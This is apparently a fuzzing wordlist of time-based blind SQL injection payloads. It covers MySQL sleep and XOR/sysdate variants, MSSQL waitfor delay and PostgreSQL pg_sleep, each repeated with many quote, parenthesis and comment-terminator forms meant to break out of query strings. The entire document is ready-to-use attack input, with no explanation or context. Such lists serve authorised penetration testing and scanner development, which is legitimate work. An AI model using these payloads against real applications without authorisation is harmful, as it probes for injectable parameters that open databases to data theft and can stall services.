0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
1'XOR(94102*if(now()=sysdate(),sleep(10),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
if(1=1,sleep(10),0)/'XOR(if(1=1,sleep(10),0))OR'"XOR(if(1=1,sleep(10),0))OR"/
if(4148=4148,exp((1)),0)/*'XOR(if(4148=4148,exp((1)),0))OR'"XOR(if(4148=4148,sleep(10),0))OR"*/
if(now()=sysdate(),sleep(10),0)
(select*(from(select(sleep(10)))a)
0'XOR(if(now()=sysdate(),sleep(6*2),0))XOR'Z
1 waitfor delay '0:0:10' --
'; waitfor delay '0:0:10' --"
(select*from(select(sleep(10)))a)
(select(0)from(select(sleep(10)))v)
-sleep(10)
'XOR(if(now()=sysdate(),sleep(10),0))OR'
1;SELECT IF((8303>8302),SLEEP(10),2356)#
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
'+(select*from(select(sleep(10)))a)+'
'; waitfor delay '0:0:10' --
0'|(if((now())like(sysdate()),sleep(10),0))|'Z
0'or(now()=sysdate()&&sleep(10))or'Z
1'XOR(select(1)from(select(sleep(10)))a)XOR'Z
XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0\"XOR(if(now()=sysdate(),sleep(10),0))XOR\"Z
XOR(if(now()=sysdate(),sleep(10),0))XOR
(select(sleep(10)))cfm)--
'XOR(if(now()=sysdate(),sleep(10),0))or'
1;select if((8303>8302),sleep(10),2356)#
(select(0)from(select(sleep(10)))v)/*'+
(select(0)from(select(sleep(10)))v)+'"+
(select(0)from(select(sleep(10)))v)+"*/
') or 11=(select 11 from pg_sleep(10))--
'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
x'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'x
x'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'x
'XOR(select(0)from(select(sleep(10)))a)XOR'Z
1 and (select(0)from(select(sleep(10)))a)-- wxyw
(select * from (select(sleep(10)))a)
');(select 4564 from pg_sleep(10))--
*'XOR(if(2=2,sleep(10),0))or'
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
,(select * from (select(sleep(10)))a)
desc,(select*from(select(sleep(10)))a)
-1+or+1=((select+1+from+(select+sleep(10))a))
sleep(10)--
(sleep 10)
(sleep(10))--
(sleep(10))
sleep(10)#
(sleep 10)--
sleep(10)="
sleep(10)='
";sleep 10--
";sleep 10
";sleep(10)--
";sleep(10)
";select sleep(10); #
1 select sleep(10); #
+ sleep(10) + '
&&sleep(10)
&&sleep(10)--
&&sleep(10)#
;sleep 10--
;sleep 10
;sleep(10)--
;sleep(10)
;select sleep(10); #
'&&sleep(10)&&'1
' select sleep(10); #
order by sleep(10)
order by sleep(10)--
order by sleep(10)#
0'||pg_sleep(10)--
;waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
);waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") if (1=1) waitfor delay '0:0:10'--
' waitfor delay '0:0:10'--
' waitfor delay '0:0:10'
or waitfor delay '0:0:10'--
or waitfor delay '0:0:10'
and waitfor delay '0:0:10'--
and waitfor delay '0:0:10'
waitfor delay '0:0:10'
;waitfor delay '0:0:10'
1 waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'
1 waitfor delay '0:0:10'-- 1337
1' waitfor delay '0:0:10' and '1337'='1337
1') waitfor delay '0:0:10' and ('1337'='1337
1) waitfor delay '0:0:10' and (1337=1337
') waitfor delay '0:0:10'--
" waitfor delay '0:0:10'--
')) waitfor delay '0:0:10'--
'))) waitfor delay '0:0:10'--
") waitfor delay '0:0:10'--
")) waitfor delay '0:0:10'--
"))) waitfor delay '0:0:10'--
";select pg_sleep(10);
;select pg_sleep(10);
and select pg_sleep(10);
1 select pg_sleep(10);
or select pg_sleep(10);
(select pg_sleep(10))
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
' or pg_sleep(10)--
1) or pg_sleep(10)--
") or pg_sleep(10)--
') or pg_sleep(10)--
1)) or pg_sleep(10)--
")) or pg_sleep(10)--
')) or pg_sleep(10)--
pg_sleep(10)
pg_sleep(10)#
or pg_sleep(10)
or pg_sleep(10)--
or pg_sleep(10)#
' select pg_sleep(10);
1 and 1337=(select 1337 from pg_sleep(10))
1 and 1337=(select 1337 from pg_sleep(10))-- 1337
1' and 1337=(select 1337 from pg_sleep(10)) and '1337'='1337
1') and 1337=(select 1337 from pg_sleep(10)) and ('1337'='1337
1) and 1337=(select 1337 from pg_sleep(10)) and (1337=1337
(select sleep(10))
(select * from (select(sleep(10)))yyyy)
(select * from (select(sleep(10)))yyyy)#
(select * from (select(sleep(10)))yyyy)--
1 and sleep 10--
1 and sleep 10
1 and sleep(10)--
1 and sleep(10)
' and sleep 10--
' and sleep 10
' and sleep 10 and '1'='1
' and sleep(10) and '1'='1
' and sleep(10)--
' and sleep(10)
' and sleep(10) and '1
and sleep 10--
and sleep 10
and sleep(10)--
and sleep(10)
and select sleep(10); #
and sleep(10)#
' and sleep(10)#
" and sleep(10)#
') and sleep(10)#
or sleep 10--
or sleep 10
or sleep(10)--
or sleep(10)
or select sleep(10); #
or sleep(10)#
or sleep(10)="
or sleep(10)='
' or sleep(10)#
" or sleep(10)#
') or sleep(10)#
select pg_sleep(10);
) or pg_sleep(10)--
)) or pg_sleep(10)--
')) or sleep(10)='
"or pg_sleep(10)--
'or pg_sleep(10)--
'waitfor delay '0:0:10'--
